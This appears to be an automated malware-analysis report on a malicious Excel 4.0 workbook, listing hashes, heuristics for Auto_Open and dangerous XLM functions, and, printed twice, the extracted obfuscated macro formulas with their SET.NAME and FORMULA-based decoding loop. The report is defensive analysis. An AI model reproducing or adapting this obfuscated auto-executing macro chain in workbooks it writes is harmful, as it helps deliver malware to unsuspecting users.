Office (OLE) malware analysis — malicious · fabe2f3c6e5ac1db

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:25:57 Authoring application: Microsoft Excel First seen: 2021-03-31

MD5: d36d28301ef941313bae7cf197cbaaf4 SHA-1: eebfed227bd3d41c09fbd94afd71e3338b4e581e SHA-256: fabe2f3c6e5ac1dbcdd795e58fd1d0fbebbdcdba83903323e2565d20d1290d80

140 Risk Score

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6683 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	6683 bytes
SHA-256: `eb9c95fe6da788544ed2aa84b3f5bdfdd07776f1952a52d64d736d924d7d636d`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - TUMDustLvVI ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!D180 ' 0018 23 LABEL : Cell Value, String Constant - AxGwCieK len=0 ' 0018 27 LABEL : Cell Value, String Constant - cymFgYqNHVWy len=0 ' 0018 20 LABEL : Cell Value, String Constant - dAUUY len=0 ' 0018 24 LABEL : Cell Value, String Constant - dUEfmrRMC len=0 ' 0018 27 LABEL : Cell Value, String Constant - DYJLhSzGeJNY len=0 ' 0018 25 LABEL : Cell Value, String Constant - ELCuQIQHne len=0 ' 0018 25 LABEL : Cell Value, String Constant - HByzJjtNam len=0 ' 0018 21 LABEL : Cell Value, String Constant - IvfMEc len=0 ' 0018 27 LABEL : Cell Value, String Constant - LvoUVpYFweNO len=0 ' 0018 20 LABEL : Cell Value, String Constant - OjmEq len=0 ' 0018 20 LABEL : Cell Value, String Constant - OUAsJ len=0 ' 0018 20 LABEL : Cell Value, String Constant - pBYrl len=0 ' 0018 23 LABEL : Cell Value, String Constant - sCgLElGr len=0 ' 0018 20 LABEL : Cell Value, String Constant - SZCTr len=0 ' 0018 23 LABEL : Cell Value, String Constant - TJQaiSDH len=0 ' 0018 20 LABEL : Cell Value, String Constant - UJhnG len=0 ' 0018 20 LABEL : Cell Value, String Constant - vDHSb len=0 ' 0018 22 LABEL : Cell Value, String Constant - VtgfRjw len=0 ' 0018 23 LABEL : Cell Value, String Constant - yjkJmBwn len=0 ' 0018 26 LABEL : Cell Value, String Constant - zEaVfRWotXi len=0 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' TUMDustLvVI,D84,"SET.NAME("TJQaiSDH",VALUE("0"))","" ' TUMDustLvVI,D89,"SET.NAME("cymFgYqNHVWy",TJQaiSDH)","" ' TUMDustLvVI,D92,"SET.NAME("sCgLElGr",TJQaiSDH)","" ' TUMDustLvVI,D94,"SET.NAME("ELCuQIQHne",COUNTA(LvoUVpYFweNO))","" ' TUMDustLvVI,D99,"SET.NAME("AxGwCieK",COUNTA(IvfMEc))","" ' TUMDustLvVI,D103,[],"" ' TUMDustLvVI,D107,"SET.NAME("HByzJjtNam","")","" ' TUMDustLvVI,D109,"cymFgYqNHVWy","" ' TUMDustLvVI,D113,"SET.NAME("dUEfmrRMC",HLOOKUP("",LvoUVpYFweNO,cymFgYqNHVWy,FALSE))","" ' TUMDustLvVI,D115,"SZCTr","" ' TUMDustLvVI,D119,"SET.NAME("pBYrl",TJQaiSDH)","" ' TUMDustLvVI,D121,[],"" ' TUMDustLvVI,D123,"pBYrl","" ' TUMDustLvVI,D128,"OjmEq","" ' TUMDustLvVI,D133,"zEaVfRWotXi","" ' TUMDustLvVI,D138,"VtgfRjw","" ' TUMDustLvVI,D143,"SET.NAME("vDHSb",VALUE(HLOOKUP("",IvfMEc,VtgfRjw,FALSE)))","" ' TUMDustLvVI,D145,"dAUUY","" ' TUMDustLvVI,D149,"HByzJjtNam","" ' TUMDustLvVI,D152,"sCgLElGr","" ' TUMDustLvVI,D157,NEXT(),"" ' TUMDustLvVI,D161,"DYJLhSzGeJNY","" ' TUMDustLvVI,D166,"SET.NAME("f",INT(T(FORMULA(T(HByzJjtNam)&"",""&T(DYJLhSzGeJNY)))))","" ' TUMDustLvVI,D168,"OUAsJ","" ' TUMDustLvVI,D173,NEXT(),"" ' TUMDustLvVI,D177,RETURN(),"" ' TUMDustLvVI,D202,"SET.NAME("yjkJmBwn",D84)","" ' TUMDustLvVI,D207,"LvoUVpYFweNO","" ' TUMDustLvVI,D210,"SET.NAME("IvfMEc",R84C15)","" ' TUMDustLvVI,D213,"SET.NAME("OUAsJ",223)","" ' TUMDustLvVI,D218,"SET.NAME("UJhnG",4)","" ' TUMDustLvVI,D222,yjkJmBwn(),"" ' TUMDustLvVI,D223,HALT(),""

SHA-256: eb9c95fe6da788544ed2aa84b3f5bdfdd07776f1952a52d64d736d924d7d636d

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  TUMDustLvVI
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!D180 
' 0018     23 LABEL : Cell Value, String Constant - AxGwCieK len=0 
' 0018     27 LABEL : Cell Value, String Constant - cymFgYqNHVWy len=0 
' 0018     20 LABEL : Cell Value, String Constant - dAUUY len=0 
' 0018     24 LABEL : Cell Value, String Constant - dUEfmrRMC len=0 
' 0018     27 LABEL : Cell Value, String Constant - DYJLhSzGeJNY len=0 
' 0018     25 LABEL : Cell Value, String Constant - ELCuQIQHne len=0 
' 0018     25 LABEL : Cell Value, String Constant - HByzJjtNam len=0 
' 0018     21 LABEL : Cell Value, String Constant - IvfMEc len=0 
' 0018     27 LABEL : Cell Value, String Constant - LvoUVpYFweNO len=0 
' 0018     20 LABEL : Cell Value, String Constant - OjmEq len=0 
' 0018     20 LABEL : Cell Value, String Constant - OUAsJ len=0 
' 0018     20 LABEL : Cell Value, String Constant - pBYrl len=0 
' 0018     23 LABEL : Cell Value, String Constant - sCgLElGr len=0 
' 0018     20 LABEL : Cell Value, String Constant - SZCTr len=0 
' 0018     23 LABEL : Cell Value, String Constant - TJQaiSDH len=0 
' 0018     20 LABEL : Cell Value, String Constant - UJhnG len=0 
' 0018     20 LABEL : Cell Value, String Constant - vDHSb len=0 
' 0018     22 LABEL : Cell Value, String Constant - VtgfRjw len=0 
' 0018     23 LABEL : Cell Value, String Constant - yjkJmBwn len=0 
' 0018     26 LABEL : Cell Value, String Constant - zEaVfRWotXi len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  TUMDustLvVI,D84,"SET.NAME("TJQaiSDH",VALUE("0"))",""
'  TUMDustLvVI,D89,"SET.NAME("cymFgYqNHVWy",TJQaiSDH)",""
'  TUMDustLvVI,D92,"SET.NAME("sCgLElGr",TJQaiSDH)",""
'  TUMDustLvVI,D94,"SET.NAME("ELCuQIQHne",COUNTA(LvoUVpYFweNO))",""
'  TUMDustLvVI,D99,"SET.NAME("AxGwCieK",COUNTA(IvfMEc))",""
'  TUMDustLvVI,D103,[],""
'  TUMDustLvVI,D107,"SET.NAME("HByzJjtNam","")",""
'  TUMDustLvVI,D109,"cymFgYqNHVWy",""
'  TUMDustLvVI,D113,"SET.NAME("dUEfmrRMC",HLOOKUP("*",LvoUVpYFweNO,cymFgYqNHVWy,FALSE))",""
'  TUMDustLvVI,D115,"SZCTr",""
'  TUMDustLvVI,D119,"SET.NAME("pBYrl",TJQaiSDH)",""
'  TUMDustLvVI,D121,[],""
'  TUMDustLvVI,D123,"pBYrl",""
'  TUMDustLvVI,D128,"OjmEq",""
'  TUMDustLvVI,D133,"zEaVfRWotXi",""
'  TUMDustLvVI,D138,"VtgfRjw",""
'  TUMDustLvVI,D143,"SET.NAME("vDHSb",VALUE(HLOOKUP("*",IvfMEc,VtgfRjw,FALSE)))",""
'  TUMDustLvVI,D145,"dAUUY",""
'  TUMDustLvVI,D149,"HByzJjtNam",""
'  TUMDustLvVI,D152,"sCgLElGr",""
'  TUMDustLvVI,D157,NEXT(),""
'  TUMDustLvVI,D161,"DYJLhSzGeJNY",""
'  TUMDustLvVI,D166,"SET.NAME("f",INT(T(FORMULA(T(HByzJjtNam)&"",""&T(DYJLhSzGeJNY)))))",""
'  TUMDustLvVI,D168,"OUAsJ",""
'  TUMDustLvVI,D173,NEXT(),""
'  TUMDustLvVI,D177,RETURN(),""
'  TUMDustLvVI,D202,"SET.NAME("yjkJmBwn",D84)",""
'  TUMDustLvVI,D207,"LvoUVpYFweNO",""
'  TUMDustLvVI,D210,"SET.NAME("IvfMEc",R84C15)",""
'  TUMDustLvVI,D213,"SET.NAME("OUAsJ",223)",""
'  TUMDustLvVI,D218,"SET.NAME("UJhnG",4)",""
'  TUMDustLvVI,D222,yjkJmBwn(),""
'  TUMDustLvVI,D223,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.